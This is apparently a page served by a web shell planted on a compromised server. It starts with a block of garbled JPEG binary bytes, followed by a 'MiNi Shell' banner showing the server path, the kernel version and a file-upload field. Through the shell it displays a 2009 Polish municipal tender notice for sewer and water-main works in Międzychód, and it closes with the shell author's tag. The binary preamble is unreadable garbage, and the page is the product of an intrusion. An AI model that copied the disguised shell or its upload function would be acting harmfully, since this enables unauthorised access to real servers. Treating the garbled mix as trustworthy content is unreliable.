JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090929/165377-N-2009.html

<p class="kh_header"><b>Międzychód: Budowę kanalizacji sanitarnej grawitacyjno - tłocznej i sieci wodociągowej w m. Mierzyn, Międzychód, Radgoszcz, 

Zadanie nr I - Modernizacja obiektu pompowni miejskiej przesyłu ścieków do oczyszczalni + kolektor tłoczny Międzychód - oczyszczalnia ścieków.</b><br>
<b>Numer ogłoszenia: 165377 - 2009; data zamieszczenia: 29.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Międzychodzie , ul. Piłsudskiego 2, 64-400 Międzychód, woj. wielkopolskie, tel. 095 7488100, faks 095 7488134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzychod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowę kanalizacji sanitarnej grawitacyjno - tłocznej i sieci wodociągowej w m. Mierzyn, Międzychód, Radgoszcz, 

Zadanie nr I - Modernizacja obiektu pompowni miejskiej przesyłu ścieków do oczyszczalni + kolektor tłoczny Międzychód - oczyszczalnia ścieków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na Modernizacji obiektu pompowni miejskiej przesyłu ścieków do oczyszczalni + kolektor tłoczny Międzychód - oczyszczalnia ścieków, których zakres rzeczowy robót obejmuje m.in: 
a/ rurociąg tłoczny PE315 (wykopy liniowe pod rurociąg - ok. 4678 m3, umocowanie ścian wykopu wypraskami stalowymi z rozbiórką - ok. 4253 m2, zasypanie wykopu spycharkami
- ok. 4508 m3, zagęszczanie nasypów ubijakami mechanicznymi - ok.4508 m3, układanie rurociągu ciśnieniowego z rur PE fi 315mm - ok. 2250mb, układanie rurociągu ciśnieniowego z rur PE fi 315 TS - ok. 40 mb, połączenie rur PE fi 315 metodą zgrzewania czołowego - ok. 229 szt, przewiert maszyną WP-30/60 do 30 m rura fi 500 - ok. 69 m, przewiert maszyną WP-30/60 do 40 m rura fi 300 - ok. 40 m, studnia z kręgów betonowych fi 1000 gł. do 2 m studnia rozprężna - 1 szt, studnia z kręgów betonowych fi 1000 gł. do 2 m studnia odpowietrzająca z wyposażeniem - 2 szt,  studnia z kręgów betonowych fi 1000 gł. do 2 m studnia czyszczakowi z wyposażeniem - 2 szt, próba pneumatyczna szczelności sieci (200 m) - ok.11,45 szt, obsługa geodezyjna wytyczenie i inwentaryzacja /za km/ - ok. 2,29 km).
b/ kanalizacja grawitacyjna z rur PCV 400 (  wykopy liniowe pod rurociąg - ok. 407 m3, umocowanie ścian wykopu wypraskami stalowymi z rozbiórką - ok. 626 m2, zasypanie wykopu spycharkami - ok. 394 m3, zagęszczanie nasypów ubijakami mechanicznymi - ok.394 m3, igłofiltry wypłukiwane w grunt bez obsypki - 45 szt, pompowanie wody z igłofiltrów, układanie rur kanalizacyjnych PVC fi 400 - ok. 108 mb, studnia rewizyjna z kręgów betonowych fi 1200 gł.  3 m  - 5 szt,  próba  szczelności sieci (50 m) - ok.2,16 szt, obsługa geodezyjna wytyczenie i inwentaryzacja, przeprowadzenie inspekcji TV - ok.108 m). 
c/ komora zasuw na istniejącym kanale fi 800 ( wykopy ręczne - ok. 87,5 m3, zasypanie wykopów - ok. 41 m3, wykonanie podłoża z betonu B-15 grub. 10 cm - ok. 1,6 m3, wykonanie i montaż zbrojenia z pręta fi 8, wykonanie i montaż zbrojenia z pręta fi 12, deskowanie ścian prostych, bloków oporowych o wys. do 3 m- ok. 102 m2, układanie betonu B-25 w ławach fundamentowych  - ok. 18,2 m3, wykonanie izolacji powierzchni betonowych, osadzenie włazy żeliwnego o wadze pow. 130 kg - 2 szt, montaż zasuwy żeliwnej fi 800 kołnierzowej - 1 kpl, montaż zasuwy żeliwnej fi 400 kołnierzowej - 1 kpl. 
d/ tłocznia ścieków w istniejącym budynku pompowni ( rozbiórka elementów betonowych, wywiezienie gruzu, wykonanie podłoża betonowego z betonu B-15 grub, 10 cm pod fundament - ok. 0,6 m3, wykonanie i montaż zbrojenia z prętów fi 6 i fi 8 mm, deskowanie ław fundamentowych, układanie betonu B-25 w ławach fundamentowych i blokach oporowych - ok. 1,9 m3, izolacja pozioma powierzchni betonowych, zakup i zamontowanie pompowni ścieków P11 - tłocznia montowana w budynku z rozruchem - 1 szt, zamontowanie rozdzielnic elektrycznych o wadze do 250kg - 1 szt, ułożenie kabla YAKY 
4 x 25 mm w budynku - ok.12mb)
e/ komora zasuw  ( demontaż płyt żelbetowych drogowych - ok. 250 m2, wykopy pod fundamenty komory zasuw- ok. 641 m3, zasypanie wykopu  po wykonaniu ścian komory - ok. 586 m3, powtórny montaż płyt żelbetowych z rozbiórki, wykonanie komory zasuw z elementów żelbetowych, zabezpieczenie powierzchni komory zasuw żywicami).
f/ roboty drogowe ( geodezyjna obsługa i dokumentacja powykonawcza, rozebranie krawężników - ok. 44m, wykopy pod budowę krawężników - ok.56 m3, podbudowa z betonu gr. 10 cm - ok. 172 m2, wykonanie nawierzchni z kostki betonowej szarej o gr. 8 cm - ok.1257 m2, montaż krawężnika betonowego 15x30 na ławie betonowej - ok. 234 m,
podniesienie włazów żeliwnych do nowego poziomu - 12 szt).
g/ roboty elektryczne przepompownia ścieków ( kopanie rowu do kabli - ok.7,36 m3, 
zasypanie wykopu, układanie kabla YKY 5x2,5 w rowie kablowym - ok. 24 m, układanie kabla YKSY 12x1,5mm w rowie kablowym - ok. 24 m, układanie kabli YKY 5x2,5mm
oraz YKSY12x1,5 mm w rurkach, kanałach zamkniętych po ok. 20 m, montaż skrzynki zasilająco sterowniczej, wykonanie uziomu powierzchniowego - ok. 12 m, pomiary linii kablowych).  
Szczegółowy zakres robót do wykonania określa przedmiar robót, kosztorys ślepy, specyfikacja techniczna wykonania i odbioru robót budowlanych oraz projekt budowlany..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.40-8, 45.11.12.00-0, 45.23.32.00-1, 45.23.24.23-3, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wpłacenia wadium w wysokości  70.000,- zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy: 
1.1	Posiadający uprawnienia do wykonywania określonej działalności lub czynności,jeżeli ustawy   nakładają obowiązek poosiadania takich uprawnień;    
1.2	Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  
1.3	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;   
1.4	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia art. 24 ustawy prawo zamówień publicznych.                                         
1.5	Zrealizowali w okresie ostatnich 5 lat co najmniej 1 zamówienia na roboty o podobnym charakterze, zakresie co przedmiot zamówienia tj. budowa sieci kanalizacji tłocznej i grawitacyjnej  o wartości minimum  1.200.000,00 zł, z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania. 
1.6	Osoby odpowiedzialne za prowadzenie robót /kierownik budowy/ winny posiadać uprawnienia niezbędne do wykonywania prac objętych przedmiotem zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane oraz należeć do właściwej Okręgowej Izby Inżynierów Budownictwa.
1.7	Udzielą co najmniej 3 letniej gwarancji na wykonane roboty.
1.8	Wpłacą wymagane wadium w wysokości  70.000,-zł.
1.9	Posiadają środki finansowe lub zdolność kredytową w wysokości minimum 500.000 zł.
1.10	Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą  niż  500.000 PLN
1.11	Wykonawca winien  dysponować co najmniej  następującymi ilościami jednostek sprzętowych:  
tj. koparka jednonaczyniowa gąsienicowa lub kołowa 0,4 do 0.6 m3.- min. 2 szt., samochód samowyładowczy (5  t) min.2 szt., zagęszczarka spalinowa wibracyjna -
min.2 szt.,ubijak spalinowy 200 kg - min.1 szt.,żuraw samochodowy do 6 t - min.1 szt.

1.12     Spełnią inne wymagania określone w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty: A.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.    A.2) Dokumenty potwierdzające posiadanie uprawnień /pełnomocnictw osób składających wniosek o dopuszczenie do udziału w postępowaniu oraz ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.    A.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.      A.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych wg wzoru druku stanowiącego załącznik nr 2 do SIWZ.     A.5) Dokumenty dodatkowe: 
-  formularz ofertowy - wg. wzoru druku stanowiącego załącznik nr 1 do SIWZ. - dowód wniesienia wadium - kosztorys /ślepy/, który po wypełnieniu przez wykonawcę stanowić będzie kosztorys ofertowy                       wg wzoru  druku stanowiącego załącznik nr 7 do SIWZ  B.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:  B.1) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj. budowa sieci kanalizacji tłocznej i grawitacyjnej o wartości 
nie mniejszej niż 1.200.000 PLN, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie, wg wzoru druku stanowiącego załącznik nr 4 do SIWZ.      B.2) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje 
lub będzie dysponował wykonawca, wg wzoru druku stanowiącego załącznik nr 3 do SIWZ.       B.3) Pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w pkt B.2 wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.     B.4) Wykaz osób tj. kierownika budowy  którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, wg  wzoru druku stanowiącego załącznik nr 5 do SIWZ. B.5) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. B.4, wykonawca wskazał osoby, którymi 
będzie dysponował.
B.6) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia niezbędne do wykonania prac objętych przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. W tym zakresie Kierownik budowy branży , kanalizacyjnej   winien posiadać uprawnienia wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane oraz należeć do właściwej Okręgowej Izby Inżynierów Budownictwa. 
C.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:    C.1) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości minimum 500.000 PLN, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
 C.2) Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę nie mniejszą niż 500.000 PLN.   D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej: D.1) Zamiast dokumentów, o których mowa w pkt.( A.1, A.3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu   -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. D.     E. Dokumenty wymagane w przypadku składania oferty wspólnej:   - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt.   A1,A2, A3, A4,C1,C2         
dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie     Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzychod.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w wersji papierowej można uzyskać pod adresem Zamawiającego podany w pkt.I..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2009 godzina 12:00, miejsce: w siedzibie zamawiającego Urząd Miasta i Gminy w Międzychodzie        
ul. Piłsudskiego 2       64-400 Międzychód       Pokój  nr 45 - Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com